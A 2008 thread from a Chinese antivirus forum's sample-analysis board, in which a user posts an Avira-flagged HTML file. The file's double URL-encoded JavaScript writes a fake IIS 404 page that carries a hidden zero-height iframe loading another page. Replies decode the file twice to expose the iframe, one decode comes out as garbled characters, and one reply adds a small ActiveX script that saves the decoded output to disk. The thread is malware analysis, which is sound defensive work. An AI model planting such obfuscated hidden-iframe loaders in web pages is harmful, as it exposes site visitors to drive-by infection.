收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 这段代码红伞报病毒。
返回列表 发新帖
查看: 2435|回复: 3
收起左侧

[可疑文件] 这段代码红伞报病毒。

[复制链接]
xinyv
发表于 2008-1-24 13:45:04 | 显示全部楼层 |阅读模式
只要把这个存为html就报病毒了。高手看看这是啥东西。
  1. <html>

  3. <head>
  4. <base>
  5. <SCRIPT LANGUAGE="Javascript">
  6. <!--
  7. var Words ="%3CHTML%3E%0D%0A%3CHEAD%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21%2D%2D%0D%0Avar%20Words%20%3D%22%253C%2521DOCTYPE%2520HTML%2520PUBLIC%2520%2522%252D%252F%252FW3C%252F%252FDTD%2520HTML%25204%252E01%252F%252FEN%2522%2520%2522http%253A%252F%252Fwww%252Ew3%252Eorg%252FTR%252Fhtml4%252Fstrict%252Edtd%2522%253E%250D%250A%253CHTML%253E%253CHEAD%253E%253CTITLE%253E%25u65E0%25u6CD5%25u627E%25u5230%25u8BE5%25u9875%253C%252FTITLE%253E%250D%250A%253CMETA%2520HTTP%252DEQUIV%253D%2522Content%252DType%2522%2520Content%253D%2522text%252Fhtml%253B%2520charset%253DGB2312%2522%253E%250D%250A%253CSTYLE%2520type%253D%2522text%252Fcss%2522%253E%250D%250A%2520%2520BODY%2520%257B%2520font%253A%25209pt%252F12pt%2520%25u5B8B%25u4F53%2520%257D%250D%250A%2520%2520H1%2520%257B%2520font%253A%252012pt%252F15pt%2520%25u5B8B%25u4F53%2520%257D%250D%250A%2520%2520H2%2520%257B%2520font%253A%25209pt%252F12pt%2520%25u5B8B%25u4F53%2520%257D%250D%250A%2520%2520A%253Alink%2520%257B%2520color%253A%2520red%2520%257D%250D%250A%2520%2520A%253Avisited%2520%257B%2520color%253A%2520maroon%2520%257D%250D%250A%253C%252FSTYLE%253E%250D%250A%253C%252FHEAD%253E%253CBODY%253E%253CTABLE%2520width%253D500%2520border%253D0%2520cellspacing%253D10%253E%253CTR%253E%253CTD%253E%250D%250A%253Ch1%253E%25u65E0%25u6CD5%25u627E%25u5230%25u8BE5%25u9875%253C%252Fh1%253E%250D%250A%25u60A8%25u6B63%25u5728%25u641C%25u7D22%25u7684%25u9875%25u9762%25u53EF%25u80FD%25u5DF2%25u7ECF%25u5220%25u9664%25u3001%25u66F4%25u540D%25u6216%25u6682%25u65F6%25u4E0D%25u53EF%25u7528%25u3002%250D%250A%253Chr%253E%250D%250A%253Cp%253E%25u8BF7%25u5C1D%25u8BD5%25u4EE5%25u4E0B%25u64CD%25u4F5C%25uFF1A%253C%252Fp%253E%250D%250A%253Cul%253E%250D%250A%253Cli%253E%25u786E%25u4FDD%25u6D4F%25u89C8%25u5668%25u7684%25u5730%25u5740%25u680F%25u4E2D%25u663E%25u793A%25u7684%25u7F51%25u7AD9%25u5730%25u5740%25u7684%25u62FC%25u5199%25u548C%25u683C%25u5F0F%25u6B63%25u786E%25u65E0%25u8BEF%25u3002%253C%252Fli%253E%250D%250A%253Cli%253E%25u5982%25u679C%25u901A%25u8FC7%25u5355%25u51FB%25u94FE%25u63A5%25u800C%25u5230%25u8FBE%25u4E86%25u8BE5%25u7F51%25u9875%25uFF0C%25u8BF7%25u4E0E%25u7F51%25u7AD9%25u7BA1%25u7406%25u5458%25u8054%25u7CFB%25uFF0C%25u901A%25u77E5%25u4ED6%25u4EEC%25u8BE5%25u94FE%25u63A5%25u7684%25u683C%25u5F0F%25u4E0D%25u6B63%25u786E%25u3002%250D%250A%253C%252Fli%253E%250D%250A%253Cli%253E%25u5355%25u51FB%253Ca%2520href%253D%2522javascript%253Ahistory%252Eback%25281%2529%2522%253E%25u540E%25u9000%253C%252Fa%253E%25u6309%25u94AE%25u5C1D%25u8BD5%25u53E6%25u4E00%25u4E2A%25u94FE%25u63A5%25u3002%253C%252Fli%253E%250D%250A%253C%252Ful%253E%250D%250A%253Ch2%253EHTTP%2520%25u9519%25u8BEF%2520404%2520%252D%2520%25u6587%25u4EF6%25u6216%25u76EE%25u5F55%25u672A%25u627E%25u5230%25u3002%253Cbr%253EInternet%2520%25u4FE1%25u606F%25u670D%25u52A1%2520%2528IIS%2529%253C%252Fh2%253E%250D%250A%253Chr%253E%250D%250A%253Cp%253E%25u6280%25u672F%25u4FE1%25u606F%25uFF08%25u4E3A%25u6280%25u672F%25u652F%25u6301%25u4EBA%25u5458%25u63D0%25u4F9B%25uFF09%253C%252Fp%253E%250D%250A%253Cul%253E%250D%250A%253Cli%253E%25u8F6C%25u5230%2520%253Ca%2520href%253D%2522http%253A%252F%252Fgo%252Emicrosoft%252Ecom%252Ffwlink%252F%253Flinkid%253D8180%2522%253EMicrosoft%2520%25u4EA7%25u54C1%25u652F%25u6301%25u670D%25u52A1%253C%252Fa%253E%25u5E76%25u641C%25u7D22%25u5305%25u62EC%2526ldquo%253BHTTP%2526rdquo%253B%25u548C%2526ldquo%253B404%2526rdquo%253B%25u7684%25u6807%25u9898%25u3002%253C%252Fli%253E%250D%250A%253Cli%253E%25u6253%25u5F00%2526ldquo%253BIIS%2520%25u5E2E%25u52A9%2526rdquo%253B%25uFF08%25u53EF%25u5728%2520IIS%2520%25u7BA1%25u7406%25u5668%2520%2528inetmgr%2529%2520%25u4E2D%25u8BBF%25u95EE%25uFF09%25uFF0C%25u7136%25u540E%25u641C%25u7D22%25u6807%25u9898%25u4E3A%2526ldquo%253B%25u7F51%25u7AD9%25u8BBE%25u7F6E%2526rdquo%253B%25u3001%2526ldquo%253B%25u5E38%25u89C4%25u7BA1%25u7406%25u4EFB%25u52A1%2526rdquo%253B%25u548C%2526ldquo%253B%25u5173%25u4E8E%25u81EA%25u5B9A%25u4E49%25u9519%25u8BEF%25u6D88%25u606F%2526rdquo%253B%25u7684%25u4E3B%25u9898%25u3002%253C%252Fli%253E%250D%250A%253C%252Ful%253E%250D%250A%250D%250A%253C%252FTD%253E%253C%252FTR%253E%253C%252FTABLE%253E%253C%252FBODY%253E%253C%252FHTML%253E%250D%250A%253Ciframe%2520src%253DXxs%252Ehtm%2520width%253D50%2520height%253D0%253E%253C%252Fiframe%253E%250D%250A%22%0D%0Afunction%20SetNewWords%28%29%0D%0A%7B%0D%0Avar%20NewWords%3B%0D%0ANewWords%20%3D%20unescape%28Words%29%3B%0D%0Adocument%2Ewrite%28NewWords%29%3B%0D%0A%7D%0D%0ASetNewWords%28%29%3B%0D%0A%2F%2F%20%2D%2D%3E%0D%0A%3C%2FSCRIPT%3E%0D%0A%3C%2FHEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C%2FBODY%3E%0D%0A%3C%2FHTML%3E%0D%0A"
  8. function SetNewWords()
  9. {
  10. var NewWords;
  11. NewWords = unescape(Words);
  12. document.write(NewWords);
  13. }
  14. SetNewWords();
  15. // -->
  16. </SCRIPT>
  17. <meta name="GENERATOR" content="Microsoft FrontPage 4.0">
  18. <meta name="ProgId" content="FrontPage.Editor.Document">
  19. </head>

  21. <body>

  23. </body>

  25. </html>
复制代码
回复

举报

qianwenxiang
发表于 2008-1-24 17:37:52 | 显示全部楼层
解两次之后:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>无法找到该页</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<STYLE type="text/css">
  BODY { font: 9pt/12pt 宋体 }
  H1 { font: 12pt/15pt 宋体 }
  H2 { font: 9pt/12pt 宋体 }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>无法找到该页</h1>
您正在搜索的页面可能已经删除、更名或暂时不可用。
<hr>
<p>请尝试以下操作:</p>
<ul>
<li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li>
<li>如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。
</li>
<li>单击<a href="javascript:history.back(1)">后退</a>按钮尝试另一个链接。</li>
</ul>
<h2>HTTP 错误 404 - 文件或目录未找到。<br>Internet 信息服务 (IIS)</h2>
<hr>
<p>技术信息(为技术支持人员提供)</p>
<ul>
<li>转到 <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft 产品支持服务</a>并搜索包括&ldquo;HTTP&rdquo;和&ldquo;404&rdquo;的标题。</li>
<li>打开&ldquo;IIS 帮助&rdquo;(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为&ldquo;网站设置&rdquo;、&ldquo;常规管理任务&rdquo;和&ldquo;关于自定义错误消息&rdquo;的主题。</li>
</ul>

</TD></TR></TABLE></BODY></HTML>
<iframe src=Xxs.htm width=50 height=0></iframe>

这段代码是在哪个网址看到的
回复

举报

tanlimo
发表于 2008-1-24 18:52:18 | 显示全部楼层
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>鄀誰~b0R鍕u?/TITLE>
<META HTTP-EQUIV="Content-Type" C>
<STYLE type="text/css">
  BODY { font: 9pt/12pt 媅SO }
  H1 { font: 12pt/15pt 媅SO }
  H2 { font: 9pt/12pt 媅SO }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>鄀誰~b0R鍕u?/h1>
╜ck(Wd"}剉u榖楋S齹騗蟸 Rd?0鬴
Tb俧鰁
N颯(u0
<hr>
<p>鲖\諎錘 N蚫\O
回复

举报

qianwenxiang
发表于 2008-1-24 20:46:38 | 显示全部楼层

回复 3楼 tanlimo 的帖子

var NewWords;
NewWords = unescape(Words);
var fso = new ActiveXObject("Scripting.FileSystemObject");
var f = fso.OpenTextFile("C:\\1.html", 2, true);
f.Write(NewWords);
f.Close();
fso = f = void(0);
window.onload = saveHtml;

把下面DOCUMENTS.WRITE那个改一下就可以输出解密过的了
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-25 15:16 , Processed in 0.142205 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表